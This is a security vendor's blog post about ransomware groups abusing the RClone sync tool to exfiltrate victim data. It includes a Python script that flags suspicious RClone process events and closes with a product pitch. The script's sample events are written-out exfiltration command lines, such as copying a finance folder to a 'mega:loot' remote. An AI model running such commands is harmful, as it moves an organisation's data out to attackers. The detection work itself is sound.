Recently, in the ever-evolving world of advanced malware, Threat Actors have been shifting from simply encrypting data to exfiltrating and distributing their victims' information. Attackers understand that by waiting after an initial compromise, they can sit and watch in order to sniff out important digital assets, steal them, and apply further pressure on companies to pay up. This was the case in the recent Los Angeles County breach involving DoppelPaymer Ransomware.
One of the newer methods of data exfiltration in ransomware attacks is through a legitimate file syncing tool called RClone. This command-line-based tool is used by many organizations to back up and store files in the cloud. SpearTip has detected the use of this tool in Maze ransomware attacks, and it has also been reported to be used with ProLock (formerly PwndLocker). RClone’s website directly states, “Over 40 cloud storage products support RClone including S3 object stores, business & consumer file storage services, as well as standard transfer protocols.” This means Threat Actors are able to use RClone to move data from their targets into the cloud very quickly and effectively. Once they possess this data, they may try to sell it or simply leak it to the public.
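As an added illustration of how a defender might spot this technique (example code written for this post, not SpearTip's tooling), the script below classifies constructed process-creation events: it flags RClone binaries outside an assumed approved install path, renamed binaries whose command line still uses RClone's copy/sync/move subcommands with a remote:path destination, and transfers to remotes not on an assumed allow-list.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample process-creation events (image path, command line); not from the original post.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("C:\\Windows\\System32\\cmd.exe", "cmd.exe /c dir"),
    ("C:\\Users\\Public\\rclone.exe", 'rclone.exe copy "C:\\Finance" mega:loot --transfers 32 -q'),
    ("C:\\ProgramData\\svchost.exe", "svchost.exe sync C:\\Shares\\HR remote1:backup --config C:\\ProgramData\\r.conf"),
    ("C:\\Program Files\\Backup\\rclone.exe", "rclone.exe sync D:\\Backups corp-s3:nightly"),
    ("C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
]

# Hypothetical allow-list: the sanctioned binary location and remote names used by the backup team.
APPROVED_IMAGE = "c:\\program files\\backup\\rclone.exe"
APPROVED_REMOTES = {"corp-s3"}

# RClone transfer subcommands, the "remote:path" form of a cloud destination, and common RClone flags.
SUBCOMMAND_RE = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.IGNORECASE)
REMOTE_RE = re.compile(r"(?<![\w\\/])([A-Za-z0-9_-]+):(?![\\/])")  # skips C:\ style drive letters
RCLONE_FLAGS = ("--config", "--transfers", "--bwlimit", "--ignore-existing", "--max-age")


def classify(image: str, cmdline: str) -> Optional[Dict[str, object]]:
    """Return a finding for one process-creation event, or None if nothing RClone-like is present."""
    image_l = image.lower()
    named_rclone = "rclone" in image_l.rsplit("\\", 1)[-1]
    has_subcmd = SUBCOMMAND_RE.search(cmdline) is not None
    remotes = [m.group(1) for m in REMOTE_RE.finditer(cmdline)]
    has_flag = any(f in cmdline for f in RCLONE_FLAGS)
    rclone_like = has_subcmd and (bool(remotes) or has_flag)
    if not (named_rclone or rclone_like):
        return None
    reasons: List[str] = []
    if named_rclone and image_l != APPROVED_IMAGE:
        reasons.append("rclone binary outside approved install path")
    if not named_rclone and rclone_like:
        reasons.append("rclone-style command line under a renamed binary")
    unknown = [r for r in remotes if r not in APPROVED_REMOTES]
    if unknown:
        reasons.append("transfer to unapproved remote(s): " + ", ".join(unknown))
    severity = "high" if reasons else "info"
    return {"image": image, "severity": severity, "reasons": reasons, "remotes": remotes}


def scan(events: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Return only the high-severity findings across a batch of events."""
    findings = (classify(img, cmd) for img, cmd in events)
    return [f for f in findings if f is not None and f["severity"] == "high"]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["image"], "->", "; ".join(finding["reasons"]))
```

In practice the events would come from EDR or Sysmon process-creation telemetry, and the allow-list from the backup team's actual configuration.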
The topic of data exfiltration is prevalent in SpearTip’s everyday operations as we assist recovering companies affected by many different variants of ransomware. As our Director has stated, this hasn’t always been the case, and we are actively adapting to each change these Threat Groups make. With the assistance of SpearTip’s wide range of tools and skills, we have been able to help companies discover the data exfiltrated and assist with the Threat Actor communication.
Our proprietary tool, ShadowSpear®, and our elite cybersecurity engineers work around the clock for you to stop attacks immediately, before they destroy your environment. Learn more about ShadowSpear® before becoming a victim of a cyberattack.